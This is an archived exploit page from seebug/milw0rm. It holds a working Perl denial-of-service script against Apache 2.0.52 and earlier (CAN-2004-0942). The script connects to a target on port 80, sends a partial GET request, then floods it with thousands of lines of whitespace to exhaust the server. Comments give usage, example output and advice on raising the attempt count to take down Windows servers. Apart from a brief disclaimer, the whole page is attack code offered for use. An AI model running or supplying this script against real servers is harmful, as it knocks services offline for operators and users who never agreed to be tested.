Apache <= 2.0.52 HTTP GET request Denial of Service Exploit

2014-07-0100:00:00

Root

www.seebug.org

175

0.966 High

EPSS

Percentile

99.6%

JSON

No description provided by source.


                                                #!/usr/bin/perl

# Based on -&#62; 
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info -&#62;
#   
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added -&#62;
#             Added future with we can exploit Apache web servers on windows system. For it you should experiment
#             with [trys] parameter of this code.
#             
#             By default parameter trys = 8000, for DoS Apache web servers on windows system try to 
#             increase this parameter.
#
#             For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
#             C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              &#60;+&#62; Prepare to start connect.
#              &#60;+&#62; Connected to 127.0.0.1
#              &#60;+&#62; Send of first part of devil header.
#              &#60;+&#62; Prepare to DoS with 10000 trys.
#              &#60;+&#62; Start DoS second part of devil header.
#              &#60;SOD&#62; |====================&#62; &#60;EOD&#62;
#              &#60;+&#62; Ok now target web server maybe DoSeD.
#
#
# Note -&#62;    
#           
#             If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
#             And if you see &#34;Eror 500&#34; you are lucky man :)
#
# Warnings -&#62; 
#             This is POC code you can use only on you own servers. Writer don&#39;t response if you damadge you servers or
#             use it for attack, or others things.  
#
# Shit -&#62; 
#             My English now is bulls shit :( I try study it :)
#            

# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)

# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.

# Contact to me at greenwood3[AT]yandex[dot]ru

use IO::Socket;

if (@ARGV &#60;1)
  {
   print &#34;\n ::: ---------------------------------------------- :::\n&#34;;
   print &#34; ::: Another yet DoS exploit for Apache &#60;= 2.0.52   :::\n&#34;;
   print &#34; ::: Usage:  ap2.0.52_dos.pl &#60;ip&#62; [trys]            :::\n&#34;;
   print &#34; ::: Coded by GreenwooD from Network Security Team  :::\n&#34;;
   print &#34; ::: ---------------------------------------------- :::\n&#34;;
   exit();
  }

print &#34;\n &#60;+&#62; Prepare to start connect.\n&#34;;

$s = IO::Socket::INET-&#62;new(Proto=&#62;&#34;tcp&#34;,
                            PeerAddr=&#62;$ARGV[0],
                            PeerPort=&#62;80,
                            Timeout=&#62;6
                            ) or die &#34; &#60;-&#62; Target web server already DoSeD ??? or can&#39;t connect :(\n&#34;;
  $s-&#62;autoflush();

print &#34; &#60;+&#62; Connected to $ARGV[0]\n&#34;;
print &#34; &#60;+&#62; Send of first part of devil header.\n&#34;;    
  
  print $s &#34;GET / HTTP/1.0\n&#34;;

$trys = 8000; # Default

if ($ARGV[1])
{
  $trys = $ARGV[1];
}

print &#34; &#60;+&#62; Prepare to DoS with $trys trys.\n&#34;;
print &#34; &#60;+&#62; Start DoS send second part of devil header.\n&#34;;    
print &#34; &#60;SOD&#62; |&#34;;

$i=0;

 do {

     print $s (&#34; &#34; x 8000 . &#34;\n&#34;); 

   
      if ($i % 500 == 0)
        { 
         print &#34;=&#34;;
        }  

     ++$i;

    } until ($i == $trys); 


print &#34;&#62; &#60;EOD&#62;\n&#34;;

close($s);

print &#34; &#60;+&#62; Ok now target web server maybe DoSeD.\n&#34;; 

# milw0rm.com [2005-03-04]